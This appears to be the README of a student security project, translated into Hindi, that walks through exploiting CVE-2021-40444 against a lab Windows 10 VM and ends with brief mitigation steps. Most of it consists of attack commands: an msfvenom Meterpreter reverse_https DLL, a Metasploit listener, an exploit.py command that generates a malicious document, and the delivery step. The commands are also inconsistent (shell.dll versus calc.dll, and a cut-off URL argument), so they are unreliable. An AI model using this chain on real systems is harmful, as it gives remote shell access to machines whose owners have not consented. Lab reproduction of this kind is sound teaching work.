TIC4301_Project
TIC4301 परियोजना - CVE-2021-40444
निम्नलिखित वैग्रांट बॉक्स डाउनलोड करें:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
वैग्रांट के माध्यम से निम्नलिखित कमांड के साथ बॉक्स आयात करें:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
सेटअप (win10):
- win10 बॉक्स में, पासवर्ड vagrant के साथ व्यवस्थापक के रूप में लॉग इन करें।
- डेस्कटॉप पर script.ps1 पर राइट क्लिक करें और powershell से चलाएं। (इसे खुला छोड़ें)
- ipconfig.exe चलाएं और इस होस्ट के लिए पता प्राप्त करें।
सेटअप (Kali):
- cd Desktop/CVE-2021-40444.
- msfvenom के साथ अपना दुर्भावनापूर्ण dll जनरेट करें। # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- मेटास्प्लॉइट में एक श्रोता प्रारंभ करें।
- दुर्भावनापूर्ण दस्तावेज़ जनरेट करें। # python3 exploit.py generate test/calc.dll http://
- http://<win 10 IP>/upload पर जाएं और फ़ाइल अपलोड करें।
- शेल के लिए सुनें।
शमन:
- KB5005565 हॉटफिक्स स्थापित करें।
- रिपॉजिटरी में patch.reg के साथ विंडोज रजिस्ट्री संपादित करें।